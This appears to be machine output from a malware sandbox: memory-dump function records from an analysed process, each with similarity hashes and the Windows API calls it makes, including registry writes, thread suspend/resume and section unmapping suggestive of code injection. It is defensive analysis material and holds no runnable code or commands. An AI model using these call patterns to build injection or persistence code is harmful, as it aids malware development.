  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
